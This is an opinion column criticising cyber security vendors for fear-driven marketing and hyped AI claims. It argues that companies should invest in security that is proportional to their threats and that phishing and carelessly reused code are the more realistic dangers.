lolloj - Fotolia
Breaking the chains: How FUD is holding the cyber sector hostage
The cyber security industry must move past fear tactics and get back to the basics of good cyber security practice
Fear, uncertainty and doubt (FUD) has become an ever-looming cloud over the cyber sector in recent years as companies and suppliers pounce on the opportunity to capitalise on this rhetoric and peddle their wares to fearful customers. To misquote the age-old advertising maxim: fear sells.
Of course, the big problem with this is that customers and, businesses – people – become immune to the constant avalanche of outlandish claims and equally outlandish fears. “FUD fatigue” is something that, unfortunately, I can guarantee we will see more of in 2019.
Predictions in January for the coming year are famously inaccurate – especially when it comes to cyber security. We will see this inaccuracy continue to spread across the three main product areas of cyber: antivirus suppliers desperate to get people to upgrade continually; firewall suppliers coming up with increasingly breathless claims about appliances infused with “ultra-next-gen” wizardry; and then my personal favourite – the logging and monitoring suppliers whose products by now should be so infused with AI [artificial intelligence] that surely Skynet should have manifested.
Unless a supplier is actually selling me a Knight Industries Two Thousand, AI is bunk and “quantum encryption processing engines” – an actual quote from a supplier’s sales literature – is also right up there.
There is a reason why people talk about being paralysed by fear. Supplier FUD undermines the decision-making process and subverts any well-thought-out cyber strategy. FUD is a cynical ploy to scare customers into buying whatever makes the salesperson’s quota this quarter.
Faced with headlines about ever-larger breaches and active foreign actors (both friend and foe), companies need to trust that they are making the right investments and choices in cyber security. And when I say right, what I really mean is what is appropriate and proportional to them.
Good cyber security is built on trust. You trust your team, your company, your partners and your suppliers. Dialling up the fear in a desperate attempt to meet this quarter’s sales goals helps no one.
Biggest cyber danger
The biggest cyber danger for companies is not the CFO getting hacked by Chinese wizard-class hackers using an offensive AI-driven quantum virus via blockchain – it’s someone from the accounts team, clicking on that phishing email link because he did his mandatory corporate security training seven months ago and has forgotten to double-check the URL.
It could also be someone from the development team facing a tight deadline and nabbing some code from GitHub, without having the time to really read through it and find that remote shell buried in line 2,361.
Suppliers can hype and sensationalise the capabilities of their products, and the scale of the threat, but ultimately all they are doing is damaging customers’ trust – the trust that is vital for a company to know that its cyber security strategy is based on a proportional and relevant response to the threats it faces as an organisation.
It is also vital that company executives and boards do not fall prey to FUD and have a knee-jerk reaction to threats without fully understanding the threat itself and the company’s wider cyber strategy. This only comes from top-level executives learning about, and fully understanding, their company’s cyber strategy and providing the security team with the resources needed to implement it successfully.
Where do we go from here?
As an industry, we need to move past the FUD and get back to the basics of good cyber security practice. What threats does a client face? From whom? What security skills and processes do they have at the moment? How are those working out? How is success even being measured?
My main prediction, and hope, for 2019 is that organisations start to accept that, no matter what they do, they will eventually get hacked – and, in accepting that, will invest in people and processes that are relevant and proportional to those threats. Maybe they will buy some new technology, but I’d rather see organisations doing that from a position of informed trust rather than supplier-stoked terror.
In the meantime, I have this great 1982 Pontiac Trans-Am that leverages quantum blockchain technology to defeat the genetically modified Outer Mongolian hacker wizards that have undoubtedly already used psychic mind hacks to pwn your CIO. Really.